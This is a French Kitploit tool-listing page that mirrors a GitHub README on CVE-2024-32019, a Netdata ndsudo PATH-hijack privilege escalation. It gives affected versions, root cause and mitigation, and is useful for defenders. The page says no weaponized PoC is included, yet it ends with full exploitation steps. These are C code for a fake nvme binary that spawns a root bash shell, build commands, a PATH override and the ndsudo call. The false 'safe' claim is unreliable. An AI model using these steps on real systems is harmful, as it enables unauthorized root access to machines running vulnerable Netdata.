Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2024-32019-PoC — Vérifie l'exposition à l'élévation de privilèges via le SUID PATH de Netdata ndsudo pour CVE-2024-32019 et valide les correctifs sans exploitation weaponisée. | Kitploit
Outils/GitHubGitHub/ayub0x7/cve-2024-32019-poc
Outils DéfensifsEscalade de PrivilègesAnalyse des VulnérabilitésExploitationVirtualisation de SécuritéTests d'Intrusion
GitHubayub0x7/cve-2024-32019-poc

cve-2024-32019-PoC

Vérifie l'exposition à l'élévation de privilèges via le SUID PATH de Netdata ndsudo pour CVE-2024-32019 et valide les correctifs sans exploitation weaponisée.

Voir le dépôt
20il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-32019 — Élévation de privilèges locale via ndsudo de Netdata

Résumé

L’assistant ndsudo de Netdata (installé setuid root) restreint les commandes qu’il exécute, mais résout ces commandes en utilisant le PATH de l’appelant. Dans les versions affectées, un utilisateur local peut placer un binaire malveillant plus tôt dans le PATH et faire exécuter celui-ci par ndsudo avec les privilèges root. Corrigé dans Netdata 1.45.3 et 1.45.0-169.

Affecté / Corrigé

  • Affecté : >= 1.44.0-60, < 1.45.0-169 et >= 1.45.0, < 1.45.3 (selon l’avis amont).

  • Corrigé : 1.45.3 (stable), 1.45.0-169 (nightly). GitHub

Impact

Élévation de privilèges locale vers root sur les systèmes où ndsudo est installé en SUID et où l’utilisateur peut l’invoquer (souvent les membres du groupe netdata). NVDGitHub

Cause racine (vue d’ensemble)

  • ndsudo est SUID-root et autorise une liste blanche de sous-commandes comme nvme-list, nvme-smart-log, etc.

  • Il appelle des exécutables externes par leur nom (par exemple nvme), qui sont résolus via le PATH au lieu d’utiliser des chemins absolus ou une recherche sûre et fixe.

  • Si un répertoire inscriptible apparaît avant les chemins système, un attaquant peut introduire un binaire sosie qui sera exécuté en tant que root. GitHub

Reproduction / Vérification sûre

Ce dépôt inclut des vérificateurs non-exploit qui :

  • Inspectent /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (ou son emplacement d’installation) pour vérifier le SUID et le propriétaire.

  • Énumèrent le PATH à la recherche de répertoires inscriptibles placés avant les chemins système courants.

  • Confirment la présence des noms de sous-commandes en liste blanche que ndsudo pourrait tenter d’exécuter.

  • Exécutent éventuellement ndsudo --test <subcommand> pour afficher la commande résolue sans l’exécuter (à utiliser avec prudence, lisez d’abord le code). GitHub

⚠️ Aucun PoC weaponisé n’est inclus. Ce projet est destiné aux défenseurs et aux chercheurs pour évaluer l’exposition et valider les correctifs de manière responsable.

Atténuation

  • Mettre à niveau Netdata vers 1.45.3 (stable) ou 1.45.0-169 (nightly).

  • Comme mesure de défense en profondeur, privilégier les chemins absolus ou un PATH minimal assaini dans les assistants SUID ; éviter d’accorder un accès inutile à ndsudo. GitHubwiz.io

Étapes d’exploitation

1. Enregistrez le code C suivant sous nvme.c :
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compiler l’exploit
gcc nvme.c - nvme
3. Configuration de l’environnement
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modifier le PATH
export PATH=/tmp/fakebin:$PATH
5. Commande d’exploitation
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list

Références

  • NVD : CVE-2024-32019. NVD

  • Avis Netdata (GHSA-pmhq-4cxq-wj93). GitHub

  • Résumé Wiz. wiz.io

  • Article Snyk. Vulnerability Guide

  • Liste MITRE/CVE. CVE

Télécharger l’outil